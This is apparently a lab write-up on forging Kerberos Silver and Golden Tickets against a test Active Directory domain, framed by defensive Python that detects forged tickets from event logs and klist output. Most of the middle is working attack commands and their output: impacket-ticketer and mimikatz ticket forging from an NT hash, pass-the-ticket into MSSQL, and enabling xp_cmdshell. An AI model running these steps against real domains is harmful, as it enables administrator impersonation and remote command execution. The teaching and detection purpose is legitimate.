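TGT_WINDOW = timedelta(hours=10)

# Constructed sample events (simplified dictionaries, not real log exports). Times are UTC.
# DC_EVENTS stand in for the domain controller's Security log, HOST_EVENTS for the member server's.
DC_EVENTS = [
    {"id": 4768, "time": "2026-03-18T21:10:00", "account": "jsmith", "client": "10.0.10.50", "enc": "0x12"},
    {"id": 4769, "time": "2026-03-18T21:10:01", "account": "jsmith", "client": "10.0.10.50",
     "service": "WS01$", "enc": "0x12"},
    {"id": 4769, "time": "2026-03-18T21:12:00", "account": "jsmith", "client": "10.0.10.50",
     "service": "MSSQLSvc/ws01.breakme.local:1433", "enc": "0x12"},
    # Forged TGT in use: a service ticket is requested although this client never got a TGT,
    # and the ticket is RC4 (0x17) although the account normally uses AES.
    {"id": 4769, "time": "2026-03-18T23:35:10", "account": "Administrator", "client": "10.0.10.99",
     "service": "DC01$", "enc": "0x17"},
]
HOST_EVENTS = [
    {"id": 4624, "time": "2026-03-18T21:10:02", "host": "WS01", "account": "jsmith",
     "client": "10.0.10.50", "package": "Kerberos", "logon_type": 3},
    {"id": 4624, "time": "2026-03-18T21:12:01", "host": "WS01", "account": "jsmith",
     "client": "10.0.10.50", "package": "Kerberos", "logon_type": 3},
    # Forged TGS in use: Kerberos logon at WS01 with no 4769 for WS01 anywhere at the DC.
    {"id": 4624, "time": "2026-03-18T23:40:00", "host": "WS01", "account": "Administrator",
     "client": "10.0.10.99", "package": "Kerberos", "logon_type": 3},
]


def _t(event):
    return datetime.fromisoformat(event["time"])


def service_host(service):
    """Map a 4769 service name to a host: 'WS01$' -> 'WS01', 'MSSQLSvc/ws01.breakme.local:1433' -> 'WS01'."""
    name = service.split("/", 1)[1] if "/" in service else service
    return name.split(".")[0].split(":")[0].rstrip("$").upper()


def tgs_without_tgt(dc_events, window=TGT_WINDOW):
    """4769s with no 4768 for the same account and client inside the window: forged-TGT indicator."""
    tgts = [e for e in dc_events if e["id"] == 4768]
    hits = []
    for req in (e for e in dc_events if e["id"] == 4769):
        t = _t(req)
        preceded = any(x["account"].lower() == req["account"].lower() and x["client"] == req["client"]
                       and t - window <= _t(x) <= t for x in tgts)
        if not preceded:
            hits.append(req)
    return hits


def logons_without_tgs(dc_events, host_events, window=TGT_WINDOW):
    """Kerberos 4624s on a host with no 4769 for that host and account at the DC: forged-TGS indicator."""
    tgs = [e for e in dc_events if e["id"] == 4769]
    hits = []
    for logon in (e for e in host_events if e["id"] == 4624 and e["package"] == "Kerberos"):
        t = _t(logon)
        preceded = any(x["account"].lower() == logon["account"].lower()
                       and service_host(x["service"]) == logon["host"].upper()
                       and t - window <= _t(x) <= t for x in tgs)
        if not preceded:
            hits.append(logon)
    return hits


def rc4_tickets(dc_events):
    """4768/4769 with Ticket Encryption Type 0x17 (RC4-HMAC), the type mimikatz and ticketer used above."""
    return [e for e in dc_events if e["id"] in (4768, 4769) and e["enc"] == "0x17"]


if __name__ == "__main__":
    for e in tgs_without_tgt(DC_EVENTS):
        print(f"[golden?] 4769 for {e['account']} from {e['client']} at {e['time']} with no prior 4768")
    for e in logons_without_tgs(DC_EVENTS, HOST_EVENTS):
        print(f"[silver?] Kerberos logon on {e['host']} as {e['account']} at {e['time']} with no 4769 at the DC")
    for e in rc4_tickets(DC_EVENTS):
        print(f"[rc4] event {e['id']} for {e['account']} used encryption type {e['enc']}")
```

In production the 4768/4769 stream has to be collected from every DC in the domain, since a client may talk to any of them, and the window should match the domain's actual maximum TGT lifetime. An RC4 ticket for an account that has AES keys is the highest-signal of the three checks, because a KDC only falls back to RC4 when something asks for it.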
[ Attacker Machine ]
|
(1) Dump Service Account Hash
(e.g., CIFS / MSSQL / HTTP)
|
v
+----------------------+
| Target Service Host |
| (knows its password)|
+----------------------+
|
(2) Forge TGS offline using service hash
|
v
[ Forged TGS ]
(User: Administrator,
Service: CIFS/DC,
Groups: Domain Admins)
|
(3) Inject ticket into memory (PTT)
|
v
[ Compromised Host ]
|
(4) Directly access service
(NO KDC communication !)
|
v
+----------------------+
| Target Service |
| (validates locally) |
+----------------------+
|
(5) Access granted
Now let's move on to the lab. I have set up an MSSQL service and we can use a Silver Ticket to exploit it.
Let's start by doing the attack from Linux.
We use the same impacket-ticketer script. The commands are the following:
# with an NT hash
python ticketer.py -nthash "$NT_HASH" -domain-sid "$DomainSID" -domain "$DOMAIN" -spn "$SPN" "username"
# with an AES (128 or 256 bits) key
python ticketer.py -aesKey "$AESkey" -domain-sid "$DomainSID" -domain "$DOMAIN" -spn "$SPN" "username"
For looking up the Domain SID, use the same lookupsid command we used earlier.
So for this we need the NT hash of the service account. For that we can do attacks like Kerberoasting: capture the hash, crack it, and convert the recovered password back into an NT hash. For that we can use this website.
We also have to specify the SPN. We can enumerate that with the following command.
◎ impacket-GetUserSPNs breakme.local/backup_admin:robert -dc-ip 172.0.10.13
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------- ------------ -------- -------------------------- -------------------------- ----------
exchange/mail.breakme.local svc_exchange 2026-01-05 13:17:16.077919 <never>
HTTP/iis01.breakme.local svc_iis 2026-01-05 13:17:16.171247 <never>
HTTP/web01.breakme.local svc_http 2026-01-05 13:17:15.862369 <never>
MSSQLSvc/ws01.breakme.local:1433 svc_mssql 2026-03-18 21:15:32.643395 2026-03-18 22:31:04.581389
Now that we have everything we need, we can start the attack.
◎ impacket-ticketer -nthash 74ED32086B1317B742C3A92148DF1019 -domain-sid S-1-5-21-3878086263-1604080912-3480837854 -domain breakme.local -spn "MSSQLSvc/ws01.breakme.local" Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breakme.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
So we got the ccache file.
Before using the ticket, let's compare normal authentication as the service account with the Silver Ticket authentication.
◎ impacket-mssqlclient -windows-auth breakme.local/svc_mssql:mustang@ws01.breakme.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WS01): Line 1: Changed database context to 'master'.
[*] INFO(WS01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (170 3232)
[!] Press help for extra shell commands
SQL (breakme\svc_mssql svc_mssql@master)> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
enum_db - enum databases
enum_links - enum linked servers
enum_impersonate - check logins that can be impersonated
enum_logins - enum login users
enum_users - enum current db users
enum_owner - enum db owner
exec_as_user {user} - impersonate with execute as user
exec_as_login {login} - impersonate with execute as login
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
xp_dirtree {path} - executes xp_dirtree on the path
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
use_link {link} - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
! {cmd} - executes a local shell cmd
upload {from} {to} - uploads file {from} to the SQLServer host {to}
show_query - show query
mask_query - mask query
SQL (breakme\svc_mssql svc_mssql@master)> enable_xp_cmdshell
ERROR(WS01): Line 105: User does not have permission to perform this action.
ERROR(WS01): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(WS01): Line 105: User does not have permission to perform this action.
ERROR(WS01): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (breakme\svc_mssql svc_mssql@master)>
With just the service account we can see that we cannot enable xp_cmdshell, which is what lets us execute shell commands.
Now let's use the ticket and impersonate Administrator.
┌──(kali㉿kali)-[~/Desktop/breakme.local]
└─$ export KRB5CCNAME=Administrator.ccache
┌──(kali㉿kali)-[~/Desktop/breakme.local]
└─$ impacket-mssqlclient -k -no-pass ws01.breakme.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WS01): Line 1: Changed database context to 'master'.
[*] INFO(WS01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (170 3232)
[!] Press help for extra shell commands
SQL (BREAKME.LOCAL\Administrator dbo@master)> enable_xp_cmdshell
INFO(WS01): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(WS01): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (BREAKME.LOCAL\Administrator dbo@master)> xp_cmdshell whoami /all
output
--------------------------------------------------------------------------------
NULL
USER INFORMATION
----------------
NULL
User Name SID
================= ==============================================
breakme\svc_mssql S-1-5-21-3878086263-1604080912-3480837854-1165
NULL
NULL
GROUP INFORMATION
-----------------
NULL
Group Name Type SID Attributes
========================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Monitor Users Alias S-1-5-32-558 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQLSERVER Well-known group S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
NULL
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
NULL
NULL
USER CLAIMS INFORMATION
-----------------------
NULL
User claims unknown.
NULL
Kerberos support for Dynamic Access Control on this device has been disabled.
NULL
SQL (BREAKME.LOCAL\Administrator dbo@master)>
We can see that, impersonating Administrator, we are able to enable xp_cmdshell and execute commands. We can also see the next door opening here: if we get a reverse shell from here, we get a shell as breakme\svc_mssql. But we can see some interesting privileges like SeImpersonatePrivilege, which points us toward a Potato attack.
Now let's see how to do the same from Windows.
We can use the following commands for it:
# with an NT hash
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$serviceAccount_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
# with an AES 128 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$serviceAccount_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
# with an AES 256 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$serviceAccount_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
C:\Users\Administrator\Desktop> .\mimikatz
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # kerberos::golden /domain:breakme.local /sid:S-1-5-21-3878086263-1604080912-3480837854 /rc4:74ED32086B1317B742C3A92148DF1019 /user:Administrator /target:ws01.breakme.local /service:MSSQLSvc /ptt
User : Administrator
Domain : breakme.local (BREAKME)
SID : S-1-5-21-3878086263-1604080912-3480837854
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 74ed32086b1317b742c3a92148df1019 - rc4_hmac_nt
Service : MSSQLSvc
Target : ws01.breakme.local
Lifetime : 18-03-2026 09:17:43 ; 15-03-2036 09:17:43 ; 15-03-2036 09:17:43
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ breakme.local' successfully submitted for current session
Or we can save the ticket to a file instead:
C:\Users\Administrator\Desktop> .\mimikatz
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # kerberos::golden /domain:breakme.local /sid:S-1-5-21-3878086263-1604080912-3480837854 /rc4:74ED32086B1317B742C3A92148DF1019 /user:Administrator /target:ws01.breakme.local /service:MSSQLSvc /ticket:silver.kirbi
User : Administrator
Domain : breakme.local (BREAKME)
SID : S-1-5-21-3878086263-1604080912-3480837854
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 74ed32086b1317b742c3a92148df1019 - rc4_hmac_nt
Service : MSSQLSvc
Target : ws01.breakme.local
Lifetime : 18-03-2026 09:19:45 ; 15-03-2036 09:19:45 ; 15-03-2036 09:19:45
-> Ticket : silver.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
C:\Users\Administrator\Desktop> klist
Current LogonId is 0:0x3e7
Cached Tickets: (2)
#0> Client: Administrator @ breakme.local
Server: krbtgt/breakme.local @ breakme.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 3/18/2026 8:18:45 (local)
End Time: 3/15/2036 8:18:45 (local)
Renew Time: 3/15/2036 8:18:45 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
#1> Client: Administrator @ breakme.local
Server: MSSQLSvc/ws01.breakme.local @ breakme.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 3/18/2026 9:17:43 (local)
End Time: 3/15/2036 9:17:43 (local)
Renew Time: 3/15/2036 9:17:43 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
C:\Users\Administrator\Desktop>
We can see both our Golden and Silver tickets present in the session: the krbtgt TGT and the MSSQLSvc service ticket. Both attacks are key to know.
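As an added defender-side example (my code, not part of the write-up), the Python below triages klist output for the three tell-tale signs visible in the cache above: a lifetime far beyond the domain's ticket policy, an empty Kdc Called field (the ticket was injected into the cache rather than issued by a DC), and RC4-HMAC in a domain that otherwise uses AES. The sample text is constructed after the klist output above; the third ticket, the user jdoe, the cifs/fs01 SPN and the DC01 name are assumed for contrast.

```python
import re
from datetime import datetime, timedelta
# Constructed sample after the klist output above; #2 is an assumed legitimate ticket (DC01 made up).
SAMPLE_KLIST = """#0> Client: Administrator @ breakme.local
Server: krbtgt/breakme.local @ breakme.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Start Time: 3/18/2026 8:18:45 (local)
End Time: 3/15/2036 8:18:45 (local)
Kdc Called:
#1> Client: Administrator @ breakme.local
Server: MSSQLSvc/ws01.breakme.local @ breakme.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Start Time: 3/18/2026 9:17:43 (local)
End Time: 3/15/2036 9:17:43 (local)
Kdc Called:
#2> Client: jdoe @ breakme.local
Server: cifs/fs01.breakme.local @ breakme.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Start Time: 3/18/2026 9:00:00 (local)
End Time: 3/18/2026 19:00:00 (local)
Kdc Called: DC01.breakme.local
"""
FIELD_RE = re.compile(r"^\s*(Client|Server|KerbTicket Encryption Type|Start Time|End Time|Kdc Called):\s*(.*)$")
def parse_klist(text):
    tickets = []  # one dict of fields per "#N>" entry
    for line in text.splitlines():
        if re.match(r"^\s*#\d+>", line):  # start of a new cached ticket
            tickets.append({})
            line = re.sub(r"^\s*#\d+>\s*", "", line)
        m = FIELD_RE.match(line)
        if tickets and m:
            tickets[-1][m.group(1)] = m.group(2).strip()
    return tickets
def _ts(value):  # "3/18/2026 8:18:45 (local)" -> datetime
    return datetime.strptime(value.replace("(local)", "").strip(), "%m/%d/%Y %H:%M:%S")

def flag_ticket(t, max_lifetime=timedelta(hours=10)):
    findings = []  # an empty list means the ticket looks normal
    lifetime = _ts(t["End Time"]) - _ts(t["Start Time"])
    if lifetime > max_lifetime:  # mimikatz defaults to a ten-year ticket
        findings.append(f"lifetime {lifetime.days} days exceeds policy maximum")
    if not t.get("Kdc Called"):  # issued tickets record the DC that served them
        findings.append("no issuing KDC recorded: ticket was injected, not requested")
    if "RC4" in t.get("KerbTicket Encryption Type", ""):
        findings.append("RC4-HMAC ticket: forged from an NT hash or downgraded from AES")
    return findings

def triage(text, max_lifetime=timedelta(hours=10)):
    # Server (SPN) -> findings, kept only for tickets showing at least one indicator
    report = {t["Server"]: flag_ticket(t, max_lifetime) for t in parse_klist(text)}
    return {spn: f for spn, f in report.items() if f}
```

Feed triage() the saved output of klist from a host under investigation; on a real domain set max_lifetime from the Kerberos policy (the default maximum service ticket lifetime is 600 minutes).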
So this is it for this write-up. Hope you enjoyed and learned from this. Bye!